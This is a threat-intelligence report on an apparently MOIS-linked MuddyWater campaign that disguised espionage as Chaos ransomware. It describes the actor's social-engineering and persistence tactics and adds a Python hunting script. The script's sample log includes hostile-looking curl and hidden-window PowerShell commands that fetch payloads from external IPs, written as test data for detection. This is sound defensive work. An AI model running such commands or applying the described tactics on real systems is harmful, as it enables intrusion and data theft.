Full Report
MOIS-linked cyber outfit puts on a ransomware show to disguise the wide-open backdoor behind the scenes
Analysis Summary
# Threat Actor: MuddyWater
## Attribution & Identity
* **Actor Name:** MuddyWater
* **Aliases:** Static Kitten, Mercury, Seedworm
* **Affiliation:** Ministry of Intelligence and Security (MOIS) of Iran
* **Confidence Level:** Medium confidence attribution by Rapid7 researchers.
* **Associations:** Historically associated with the "Agonizing Serpens" persona and now observed masquerading as affiliates of the **Chaos Ransomware** group.
## Activity Summary
The reported campaign involves a state-sponsored espionage operation disguised as a financially motivated ransomware attack. Observed in early 2026, the actor utilized a blend of social engineering and technical intrusion to gain access to Western networks. Unlike typical ransomware attacks, no encryption occurred; instead, the actor used the "Chaos" ransomware brand as a false flag to provide plausible deniability while exfiltrating sensitive data and maintaining long-term backdoor access.
## Tactics, Techniques & Procedures
* **Social Engineering:** Phishing campaigns combined with "expert persuasion" to convince targets to share screens.
* **Credential Harvesting:** Instructing users to type credentials into local plaintext files and deploying phishing pages mimicking internal portals.
* **MFA Manipulation:** Convincing targets to modify Multi-Factor Authentication (MFA) settings to allow attacker-controlled devices to authenticate.
* **Remote Access:** Deployment of legitimate Remote Management Tools (AnyDesk) to facilitate persistence.
* **Lateral Movement:** Execution of commands via Remote Desktop Protocol (RDP) using compromised valid credentials.
* **Defense Evasion:** Use of a malicious Microsoft WebView2 loader to disguise malicious traffic as legitimate application activity.
* **False Flag Operations:** Use of an Onion link leading to the Chaos ransomware Data Leak Site (DLS) and sending internal "extortion" emails to misdirect incident responders.
* **Persistence:** Use of the `curl` command to download secondary payloads.
## Targeting
* **Sectors:** Western Government, Banking networks, and general enterprise.
* **Geography:** Western nations (implied global reach based on MOIS history).
* **Victims:** Specific organizations were not named, but the article notes intrusions affecting Western government and banking infrastructure.
## Tools & Infrastructure
* **Malware:**
  * **Darkcomp:** A backdoor malware used for command execution and persistence.
  * **Microsoft WebView2 Loader:** Malicious loader used to mask traffic.
* **Software:** AnyDesk (Remote Desktop Software), curl (data transfer).
* **Infrastructure:**
  * Chaos Ransomware Data Leak Site (DLS) on the dark web (h[t]tp[:]//[redacted][.]onion).
  * Encrypted configuration files for C2 instructions.
## Implications
* **Strategic Misdirection:** By posing as ransomware actors, MuddyWater forces defenders to prioritize ransomware remediation (searching for encryptors) while the group focuses on quiet data exfiltration and maintaining backdoors.
* **Plausible Deniability:** Using established criminal "brands" like Chaos allows the Iranian state to distance itself from geopolitical friction caused by cyberespionage.
* **Prepositioning:** The activity may serve as "prepositioning" for future destructive attacks, where the actor maintains access to critical infrastructure under the guise of periodic criminal activity.
## Mitigations
* **User Training:** Educate employees never to share credentials via screensharing or enter passwords into local text files at the request of "support" or unknown entities.
* **MFA Hardening:** Implement phish-resistant MFA (FIDO2/WebAuthn) and restrict users' ability to self-register or modify MFA devices without administrative approval.
* **RDP Security:** Restrict RDP access to dedicated management jump hosts and enforce VPN requirements with strict conditional access.
* **Execution Monitoring:** Monitor for the unauthorized use of commercial remote access tools (AnyDesk, TeamViewer) and unusual `curl` or `powershell` commands downloading files from external IPs.
* **Process Auditing:** Audit the use of WebView2 controls within the environment to identify anomalous or unsigned loaders.
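The "Execution Monitoring" item above, and the Remote Access, Lateral Movement and Persistence TTPs it responds to, can be turned into a concrete hunt over process-creation telemetry. The script below is an added example written for this summary, not code from Rapid7 or from the report; it assumes a constructed `host|user|image|cmdline` log format, a fixed list of internal address ranges, and sample events that are invented (the 203.0.113.0/24 and 198.51.100.0/24 addresses are documentation ranges standing in for public IPs). It flags launches of commercial remote-access tools and `curl`/`powershell` invocations whose command line fetches from a literal external IP.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Executables named in the report's mitigations: remote-access tools and download utilities.
REMOTE_ACCESS_TOOLS = {"anydesk.exe", "teamviewer.exe"}
DOWNLOAD_UTILITIES = {"curl.exe", "curl", "powershell.exe", "pwsh.exe"}

# Ranges treated as internal for this hunt (assumption); everything else counts as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]

# Literal-IP URLs only; hostname URLs need DNS or proxy logs to resolve and are out of scope here.
IP_URL_RE = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(?:/|\s|$)", re.IGNORECASE)


@dataclass
class ProcessEvent:
    host: str
    user: str
    image: str      # full path of the started executable
    cmdline: str


def parse_line(line: str) -> ProcessEvent:
    """Parse the constructed 'host|user|image|cmdline' format used by the sample below."""
    host, user, image, cmdline = line.rstrip("\n").split("|", 3)
    return ProcessEvent(host, user, image, cmdline)


def is_external(ip_text: str) -> bool:
    """True when the address falls outside every INTERNAL_NETS range."""
    try:
        addr = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETS)


def classify(ev: ProcessEvent) -> Optional[str]:
    """Return a finding tag for events matching the report's TTPs, else None."""
    exe = ev.image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if exe in REMOTE_ACCESS_TOOLS:
        return "remote-access-tool"
    if exe in DOWNLOAD_UTILITIES:
        external = [m.group(1) for m in IP_URL_RE.finditer(ev.cmdline)
                    if is_external(m.group(1))]
        if external:
            return "download-from-external-ip:" + ",".join(external)
    return None


def hunt(lines) -> List[Tuple[str, str, str]]:
    """Run classify() over raw log lines; return (host, user, tag) for each hit."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_line(line)
        tag = classify(ev)
        if tag:
            findings.append((ev.host, ev.user, tag))
    return findings


# Constructed sample telemetry (not from the report): one AnyDesk launch, one curl pull from
# an external IP, one internal curl fetch, one PowerShell download, one browser visit.
SAMPLE_LOG = """\
WS-FIN-07|corp\\jdoe|C:\\Users\\jdoe\\Downloads\\AnyDesk.exe|AnyDesk.exe
WS-FIN-07|corp\\jdoe|C:\\Windows\\System32\\curl.exe|curl.exe -s -o C:\\Users\\Public\\svc.dat http://203.0.113.10/svc.dat
SRV-APP-02|corp\\svc_build|C:\\Windows\\System32\\curl.exe|curl.exe -o build.zip http://10.20.30.40/artifacts/build.zip
WS-HR-03|corp\\asmith|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -nop -w hidden Invoke-WebRequest http://198.51.100.7:8080/a.ps1 -OutFile C:\\Temp\\a.ps1
WS-HR-03|corp\\asmith|C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|chrome.exe http://203.0.113.10/
"""

if __name__ == "__main__":
    for host, user, tag in hunt(SAMPLE_LOG.splitlines()):
        print(f"{host:<10} {user:<16} {tag}")
```

On the sample, the browser visit and the internal `curl` fetch are left alone while the AnyDesk launch and the two external-IP downloads are reported. In production the internal-range list should come from the organisation's address plan, and the remote-access-tool check should be an allow-list keyed on the managed installation path rather than on file name alone, since the report notes the tool itself is legitimate software.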